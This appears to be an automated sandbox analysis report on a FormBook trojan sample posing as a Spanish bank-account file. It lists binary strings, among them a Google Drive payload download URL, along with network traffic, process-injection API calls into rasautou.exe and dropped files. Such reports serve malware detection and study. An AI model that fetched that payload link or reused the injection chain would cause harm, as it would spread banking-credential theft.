Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodo
Source: cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: cuenta iban-ES65.exe, cuenta iban-ES65.exe, 00000000.00000000.12574161471.0000000000409000.00000008.00000001.01000000.00000003.sdmp, cuenta iban-ES65.exe, 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: cuenta iban-ES65.exe, 00000000.00000000.12574161471.0000000000409000.00000008.00000001.01000000.00000003.sdmp, cuenta iban-ES65.exe, 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: cuenta iban-ES65.exe, 00000002.00000003.13144570001.0000000007498000.00000004.00000020.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000003.13122562796.0000000007498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: cuenta iban-ES65.exe, 00000002.00000002.13283605689.0000000007419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1j1VFygJSJQJfmjwitmF1Eadu2Np-LLta
Source: cuenta iban-ES65.exe, 00000002.00000002.13283605689.0000000007419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1j1VFygJSJQJfmjwitmF1Eadu2Np-LLtaX9t
Source: cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/ae
Source: cuenta iban-ES65.exe, 00000002.00000003.13144570001.0000000007498000.00000004.00000020.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000002.13283605689.00000000073D8000.00000004.00000020.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000003.13122562796.0000000007498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1j1VFygJSJQJfmjwitmF1Eadu2Np-LLta&export=download
Source: cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1j1VFygJSJQJfmjwitmF1Eadu2Np-LLta&export=download:
Source: cuenta iban-ES65.exe, 00000002.00000002.13283605689.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1j1VFygJSJQJfmjwitmF1Eadu2Np-LLta&export=downloadI8
Source: cuenta iban-ES65.exe, 00000002.00000002.13283605689.00000000073D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1j1VFygJSJQJfmjwitmF1Eadu2Np-LLta&export=download~
Source: cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: cuenta iban-ES65.exe, 00000002.00000003.13144570001.0000000007498000.00000004.00000020.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000003.13122562796.0000000007498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: cuenta iban-ES65.exe, 00000002.00000003.13144570001.0000000007498000.00000004.00000020.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000003.13122562796.0000000007498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: cuenta iban-ES65.exe, 00000002.00000003.13144570001.0000000007498000.00000004.00000020.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000003.13122562796.0000000007498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: cuenta iban-ES65.exe, 00000002.00000003.13144570001.0000000007498000.00000004.00000020.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000003.13122562796.0000000007498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: cuenta iban-ES65.exe, 00000002.00000003.13144570001.0000000007498000.00000004.00000020.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000003.13122562796.0000000007498000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 50225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50224

Source: unknown	HTTPS traffic detected: 142.250.68.46:443 -> 192.168.11.20:50224 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.188.225:443 -> 192.168.11.20:50225 version: TLS 1.2

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe

Code function: 0_2_00405063 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405063

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000002.00000002.13296486032.00000000373E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.17650481892.0000000000B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.17648564741.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.13297432271.0000000037A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.17651341900.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.17650879103.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.17652208499.0000000005110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000002.00000002.13296486032.00000000373E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.17650481892.0000000000B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.17648564741.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.13297432271.0000000037A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.17651341900.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.17650879103.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.17652208499.0000000005110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377734E0 NtCreateMutant,LdrInitializeThunk,	2_2_377734E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772D10 NtQuerySystemInformation,LdrInitializeThunk,	2_2_37772D10
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772B90 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_37772B90
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37774570 NtSuspendThread,	2_2_37774570
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37774260 NtSetContextThread,	2_2_37774260
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772F30 NtOpenDirectoryObject,	2_2_37772F30
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772F00 NtCreateFile,	2_2_37772F00
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772FB0 NtSetValueKey,	2_2_37772FB0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772E50 NtCreateSection,	2_2_37772E50
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772E00 NtQueueApcThread,	2_2_37772E00
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772ED0 NtResumeThread,	2_2_37772ED0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772EC0 NtQuerySection,	2_2_37772EC0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772EB0 NtProtectVirtualMemory,	2_2_37772EB0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772E80 NtCreateProcessEx,	2_2_37772E80
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772D50 NtWriteVirtualMemory,	2_2_37772D50
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772DC0 NtAdjustPrivilegesToken,	2_2_37772DC0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772DA0 NtReadVirtualMemory,	2_2_37772DA0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772C50 NtUnmapViewOfSection,	2_2_37772C50
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37773C30 NtOpenProcessToken,	2_2_37773C30
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772C30 NtMapViewOfSection,	2_2_37772C30
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772C20 NtSetInformationFile,	2_2_37772C20
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772C10 NtOpenProcess,	2_2_37772C10
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772CF0 NtDelayExecution,	2_2_37772CF0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772CD0 NtEnumerateKey,	2_2_37772CD0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37773C90 NtOpenThread,	2_2_37773C90
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772B20 NtQueryInformationProcess,	2_2_37772B20
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772B10 NtAllocateVirtualMemory,	2_2_37772B10
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772B00 NtQueryValueKey,	2_2_37772B00
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772BE0 NtQueryVirtualMemory,	2_2_37772BE0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772BC0 NtQueryInformationToken,	2_2_37772BC0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772B80 NtCreateKey,	2_2_37772B80
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772A10 NtWriteFile,	2_2_37772A10
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772AC0 NtEnumerateValueKey,	2_2_37772AC0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772AA0 NtQueryInformationFile,	2_2_37772AA0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37772A80 NtClose,	2_2_37772A80
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377729F0 NtReadFile,	2_2_377729F0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377729D0 NtWaitForSingleObject,	2_2_377729D0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377738D0 NtGetContextThread,	2_2_377738D0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05284570 NtSuspendThread,LdrInitializeThunk,	5_2_05284570
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052834E0 NtCreateMutant,LdrInitializeThunk,	5_2_052834E0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05284260 NtSetContextThread,LdrInitializeThunk,	5_2_05284260
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282D10 NtQuerySystemInformation,LdrInitializeThunk,	5_2_05282D10
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282DA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_05282DA0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282C30 NtMapViewOfSection,LdrInitializeThunk,	5_2_05282C30
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282C50 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_05282C50
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282CF0 NtDelayExecution,LdrInitializeThunk,	5_2_05282CF0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282F00 NtCreateFile,LdrInitializeThunk,	5_2_05282F00
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282E00 NtQueueApcThread,LdrInitializeThunk,	5_2_05282E00
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282E50 NtCreateSection,LdrInitializeThunk,	5_2_05282E50
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282ED0 NtResumeThread,LdrInitializeThunk,	5_2_05282ED0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052829F0 NtReadFile,LdrInitializeThunk,	5_2_052829F0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052838D0 NtGetContextThread,LdrInitializeThunk,	5_2_052838D0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282B00 NtQueryValueKey,LdrInitializeThunk,	5_2_05282B00
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282B10 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_05282B10
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282B80 NtCreateKey,LdrInitializeThunk,	5_2_05282B80
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282B90 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_05282B90
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282BC0 NtQueryInformationToken,LdrInitializeThunk,	5_2_05282BC0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282A10 NtWriteFile,LdrInitializeThunk,	5_2_05282A10
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282A80 NtClose,LdrInitializeThunk,	5_2_05282A80
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282AC0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_05282AC0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282D50 NtWriteVirtualMemory,	5_2_05282D50
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282DC0 NtAdjustPrivilegesToken,	5_2_05282DC0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282C20 NtSetInformationFile,	5_2_05282C20
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05283C30 NtOpenProcessToken,	5_2_05283C30
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282C10 NtOpenProcess,	5_2_05282C10
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05283C90 NtOpenThread,	5_2_05283C90
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282CD0 NtEnumerateKey,	5_2_05282CD0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282F30 NtOpenDirectoryObject,	5_2_05282F30
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282FB0 NtSetValueKey,	5_2_05282FB0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282EB0 NtProtectVirtualMemory,	5_2_05282EB0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282E80 NtCreateProcessEx,	5_2_05282E80
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282EC0 NtQuerySection,	5_2_05282EC0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_052829D0 NtWaitForSingleObject,	5_2_052829D0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282B20 NtQueryInformationProcess,	5_2_05282B20
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282BE0 NtQueryVirtualMemory,	5_2_05282BE0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_05282AA0 NtQueryInformationFile,	5_2_05282AA0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_03288780 NtDeleteFile,	5_2_03288780
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_032886C0 NtReadFile,	5_2_032886C0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_03288590 NtCreateFile,	5_2_03288590
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_03288930 NtAllocateVirtualMemory,	5_2_03288930
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 5_2_03288800 NtClose,	5_2_03288800

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe

Code function: 0_2_004030EC EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,

0_2_004030EC

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	File created: C:\Windows\resources\0409			Jump to behavior
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	File created: C:\Windows\hotdoggen.ini			Jump to behavior

Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37742760	2_2_37742760
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774A760	2_2_3774A760
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F6757	2_2_377F6757
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37764670	2_2_37764670
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377ED646	2_2_377ED646
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377DD62C	2_2_377DD62C
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775C600	2_2_3775C600
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FF6F6	2_2_377FF6F6
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3773C6E0	2_2_3773C6E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377B36EC	2_2_377B36EC
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FA6C0	2_2_377FA6C0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37740680	2_2_37740680
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3780A526	2_2_3780A526
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FF5C9	2_2_377FF5C9
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F75C6	2_2_377F75C6
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37740445	2_2_37740445
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FF330	2_2_377FF330
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774E310	2_2_3774E310
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37731380	2_2_37731380
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F124C	2_2_377F124C
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772D2EC	2_2_3772D2EC
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3778717A	2_2_3778717A
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377DD130	2_2_377DD130
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3772F113	2_2_3772F113
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3780010E	2_2_3780010E
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775B1E0	2_2_3775B1E0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377451C0	2_2_377451C0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377EE076	2_2_377EE076
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F70F1	2_2_377F70F1
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774B0D0	2_2_3774B0D0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377300A0	2_2_377300A0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3777508C	2_2_3777508C
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FFF63	2_2_377FFF63
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774CF00	2_2_3774CF00
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37746FE0	2_2_37746FE0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F1FC6	2_2_377F1FC6
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FEFBF	2_2_377FEFBF
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377E0E6D	2_2_377E0E6D
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37760E50	2_2_37760E50
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37782E48	2_2_37782E48
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37732EE8	2_2_37732EE8
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F9ED2	2_2_377F9ED2
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37741EB2	2_2_37741EB2
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F0EAD	2_2_377F0EAD
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37740D69	2_2_37740D69
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F7D4C	2_2_377F7D4C
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FFD27	2_2_377FFD27
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3773AD00	2_2_3773AD00
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377DFDF4	2_2_377DFDF4
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37749DD0	2_2_37749DD0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37752DB0	2_2_37752DB0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37743C60	2_2_37743C60
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F6C69	2_2_377F6C69
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FEC60	2_2_377FEC60
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377EEC4C	2_2_377EEC4C
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3774AC20	2_2_3774AC20
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37730C12	2_2_37730C12
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3780ACEB	2_2_3780ACEB
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775FCE0	2_2_3775FCE0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37758CDF	2_2_37758CDF
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377D9C98	2_2_377D9C98
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FFB2E	2_2_377FFB2E
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37740B10	2_2_37740B10
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3777DB19	2_2_3777DB19
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377B4BC0	2_2_377B4BC0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FEA5B	2_2_377FEA5B
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FCA13	2_2_377FCA13
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775FAA0	2_2_3775FAA0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FFA89	2_2_377FFA89
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377859C0	2_2_377859C0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3773E9A0	2_2_3773E9A0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FE9A6	2_2_377FE9A6
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37749870	2_2_37749870
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3775B870	2_2_3775B870
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377FF872	2_2_377FF872
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37726868	2_2_37726868
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377E0835	2_2_377E0835
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_3776E810	2_2_3776E810
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_37743800	2_2_37743800
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F78F3	2_2_377F78F3
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377F18DA	2_2_377F18DA
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377428C0	2_2_377428C0
Source: C:\Users\user\Desktop\cuenta iban-ES65.exe	Code function: 2_2_377B98B2	2_2_377B98B2
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Code function: 4_2_02F90235	4_2_02F90235
Source: C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe	Code function: 4_2_02F92206	4_2_02F92206
